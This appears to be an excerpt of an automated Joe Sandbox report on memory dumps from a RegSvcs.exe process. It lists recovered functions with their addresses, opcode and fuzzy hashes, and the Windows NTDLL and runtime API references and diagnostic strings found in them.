Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: a95643fa5e114fac62dfb86d5910e3f08d5b16233df80b82ad20d29836015ca5
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: DBD01236100248EFCB45DF81C890D9A772AFBD8710F148019FD19077118A31ED62DA50

Function 0116C7F0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a93b78b4f3aab30918e7eb6a748612c734bffc3b04e31a2f267280f2c313703
Instruction ID: a9f59c1bc6207b84c45b2d13cbfcabf5737d819070c01187458a3dc8a193fe80
Opcode Fuzzy Hash: 2a93b78b4f3aab30918e7eb6a748612c734bffc3b04e31a2f267280f2c313703
Instruction Fuzzy Hash: 08C002343116458FCF16CB29C284A5D77E4BB45644B8944D0E844DB721D764EC018B00

Function 01130750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 76c55db8d7a4ea74908a15c8e1ae4b516da15e3c0d4c2debd53a31a0669c8e81
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 33C04879B12A428FCF1AEB2AD294F4977E4FB44B54F154890E849CBB22E724E801CA10

Function 0116C68B Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e17d1755e8b5ae788cb40f3423f4a795a8e616f0ca131f34ab0bee9c24fef3
Instruction ID: d33d88719dc16a74fd0ec3e7870dc127b210c819ddff04d2e482255637799280
Opcode Fuzzy Hash: a2e17d1755e8b5ae788cb40f3423f4a795a8e616f0ca131f34ab0bee9c24fef3
Instruction Fuzzy Hash: 7FC09232161460AFC736EF09DE85F163BA9FB24B98F840060B104C2966C228E821CB58

Function 0116A060 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e1cf65d9f8c0e9fa4e3eee3b949005c21d4aa932b739b658db39a27f3808d6
Instruction ID: ef17cdf6a2adaa267aa02b60c1b2a1a0fe97492772204fd7d8c70fabf4a53cef
Opcode Fuzzy Hash: 75e1cf65d9f8c0e9fa4e3eee3b949005c21d4aa932b739b658db39a27f3808d6
Instruction Fuzzy Hash: 5BB012730225809BC71E6B04E900F013765E7C4730F3504A8B006478604B24DC11D504

Function 0119634C Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab27d0e19bc8b3d3cc183f932446174a87e1dae8b67ccaab3f7db6ffdfc867e2
Instruction ID: 616ad625a123fda1ec50d7d6051e245bd46809f442574e11dbc89a1730179c56
Opcode Fuzzy Hash: ab27d0e19bc8b3d3cc183f932446174a87e1dae8b67ccaab3f7db6ffdfc867e2
Instruction Fuzzy Hash: 0FB001B6656980DBD21ACB88E599B5577A4FB04A44F0604A1A80287A52D629E9908906

Function 0116A950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581a630ff1c3e78aa7bd7181688fc29c6c476f27700cb95cafc8dc3a50891ae5
Instruction ID: ec4ac02c4556d1f69bc0baf0286a380c7050541df03528b994f8fd8c5fd4c144
Opcode Fuzzy Hash: 581a630ff1c3e78aa7bd7181688fc29c6c476f27700cb95cafc8dc3a50891ae5
Instruction Fuzzy Hash: 04A02233020882CFCB0BBF00CA00F00B338FB80A00FC000A0A00002838C32CCC02CA02

Function 01192BF6 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6497d98dbca5d8ab111afa168aff7ee6b11b9e5a0af3185f73636f9294bcf1
Instruction ID: 42c30c12a52d0197f27cf0c3d45a175a2488ecb6a9fb88cac3ba5480d0d5a3a5
Opcode Fuzzy Hash: fb6497d98dbca5d8ab111afa168aff7ee6b11b9e5a0af3185f73636f9294bcf1
Instruction Fuzzy Hash: 48B011B2202C80CBC20ACB08E088B0033A0FB00B00F0A00A0E802C3A02C32CEA00C802

Function 01160A50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0b307c3be0d404b29e4e027334f1b7dbcccb1ed22bba2e199e3f74ee91561b
Instruction ID: 3796370556da1e951d35d264a8f90dc1c1e59fbe7236b2137a775b4abeb094fc
Opcode Fuzzy Hash: 3b0b307c3be0d404b29e4e027334f1b7dbcccb1ed22bba2e199e3f74ee91561b
Instruction Fuzzy Hash: 98A0223A020880CFCB0BBF00CA00F283338FB08A80FC080A0B00383830832FCC20CA00

Function 01174A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01174A8F

Strings

0I8w, xrefs: 01174AD0, 01174AD5
0I8w, xrefs: 01174B04, 01174B09
0I8w, xrefs: 01174AFA
0I8w, xrefs: 01174B14
0I8w, xrefs: 01174AEA, 01174AEF
0I8w, xrefs: 01174ADA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0I8w$0I8w$0I8w$0I8w$0I8w$0I8w
API String ID: 3446177414-2549722193
Opcode ID: 6633afe00c0e43a2b74675c33c8fa5a11485c28913e945fd48cbe79703252096
Instruction ID: d5a8fc26ac20149dac4dbc3015359a563d00217a5a34010011df539564565e79
Opcode Fuzzy Hash: 6633afe00c0e43a2b74675c33c8fa5a11485c28913e945fd48cbe79703252096
Instruction Fuzzy Hash: 1F01F532E152747AEF389F2D780C78E2BA1B38872CF55105AE9088B384D7644DC1C390

Function 01172890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0117293C
___swprintf_l.LIBCMT ref: 0117295E
___swprintf_l.LIBCMT ref: 011729A3
___swprintf_l.LIBCMT ref: 011AA52E

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
Instruction ID: cc37e49180f413548ee81f9d5e13d1a5f5a4f55caecb2870c3d0f30ff956d979
Opcode Fuzzy Hash: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
Instruction Fuzzy Hash: 0651D6B5A00126AFDB19DB9C889097EFBF8BB08240B54C169F4A5D7741E374DE51CBA0

Function 0114A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011979D5
RtlpFindActivationContextSection_CheckParameters, xrefs: 011979D0, 011979F5
SsHd, xrefs: 0114A3E4
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011979FA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: d542acc9ecbabef47fed465b9bb43f8616e63bae7ce29720eb4882e8d51901cb
Instruction ID: ccaaee13d137d4248ffbfe3b5be444133afb5ab6d72b108a51f0ce03bc3638bd
Opcode Fuzzy Hash: d542acc9ecbabef47fed465b9bb43f8616e63bae7ce29720eb4882e8d51901cb
Instruction Fuzzy Hash: EFE1D7706443018FE72DCE28D494B6A7BE1BF84714F1A4A2DE967CB2D1E731D945CB82

Function 0114D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0119948C

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01199346
RtlpFindActivationContextSection_CheckParameters, xrefs: 01199341, 01199366
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0119936B
GsHd, xrefs: 0114D874

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 12afbca2102a27247ac59032f4335573d9abd9453e19c1ef8d8da8489cc56075
Instruction ID: 9f49cf2463bd02ebdbe0dd0f0060401a0406b13cb2ff01b03623169fd024de1b
Opcode Fuzzy Hash: 12afbca2102a27247ac59032f4335573d9abd9453e19c1ef8d8da8489cc56075
Instruction Fuzzy Hash: 9CE1F7746043468FEF2DCF68C480B6ABBE5BF58718F04492DE995CB281D771E944CB52

Function 0117B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0117B6BF

Strings

+, xrefs: 0117B65A
0, xrefs: 0117B66F
-, xrefs: 0117B650
0, xrefs: 0117B695

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: e87b829da64a4df289bf188e32e38dac7825346c8dcde481e7b527deefe42f67
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: 3D81B170E492499EEF2D8E6CC8917FEBBB2AF45320F184219E961A73D1C7349940CB59

Function 01139126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01192559

Strings

$, xrefs: 01139191
@, xrefs: 01139175

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: c8399968eec10fa41951bc3d25213d2b5746dad27814a6ea8f084a28f8264af6
Instruction ID: e5815e54966b6d40d21bdd0ef86c330e109e94c5618c975efb96941d14588da6
Opcode Fuzzy Hash: c8399968eec10fa41951bc3d25213d2b5746dad27814a6ea8f084a28f8264af6
Instruction Fuzzy Hash: D0810B72D00269ABDB399F54CC44BEEB7B8AB48754F0041DAEA19B7680D7705E84CFA0

Function 01174960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011749A4

Strings

0I8w, xrefs: 01174A23
0I8w, xrefs: 01174A13
0I8w, xrefs: 01174A03
X, xrefs: 011749F0

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0I8w$0I8w$0I8w$X
API String ID: 3446177414-113150377
Opcode ID: b1fa2cbd14eb70273e54f9798b8cf04843bb0c87b03e8275a602a4a1069496b9
Instruction ID: 95d5d611de782adb39ff54a5d6eae9aad956fb336a1b893716821b89f72f4aaa
Opcode Fuzzy Hash: b1fa2cbd14eb70273e54f9798b8cf04843bb0c87b03e8275a602a4a1069496b9
Instruction Fuzzy Hash: DC31893290025AFBCF36AF99E848B8D7BB5ABC8758F015019FD0596341D3748BA0CF96

Function 0115DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0119F611

Strings

Invalid heap signature for heap at %p, xrefs: 0119F653
, passed to %s, xrefs: 0119F662
RtlUnlockHeap, xrefs: 0119F65D

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-56086060
Opcode ID: 476f98255dc9d7c76f1236c26605bcd2fed68f29f84c972cdaf334c6f425750f
Instruction ID: e9f5549df8c8bbfd98512313980773abc6b5204e3908868a84c1e49f8862cd44
Opcode Fuzzy Hash: 476f98255dc9d7c76f1236c26605bcd2fed68f29f84c972cdaf334c6f425750f
Instruction Fuzzy Hash: 52416B71A00742EFDF2EDF68C489B69BBB5FF01728F144169D96187291C774A881CBD1

Function 0115DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0119F757

Strings

Invalid heap signature for heap at %p, xrefs: 0119F799
, passed to %s, xrefs: 0119F7A8
RtlLockHeap, xrefs: 0119F7A3

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-3526935505
Opcode ID: 6892eee6ec6c8fe70713007f1a24562d3b2e095e6fdf114858447844d7e9ff85
Instruction ID: a25350f3a237bcde3dcde76c0731e57b5d06f9c19b6bfbddb57bdbf123cd360d
Opcode Fuzzy Hash: 6892eee6ec6c8fe70713007f1a24562d3b2e095e6fdf114858447844d7e9ff85
Instruction Fuzzy Hash: A7313531604B95EFDF2FDB68D809B5D7BE4EF02B54F044049E86287692C7F8A881C752

Function 0112C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0112C0B4
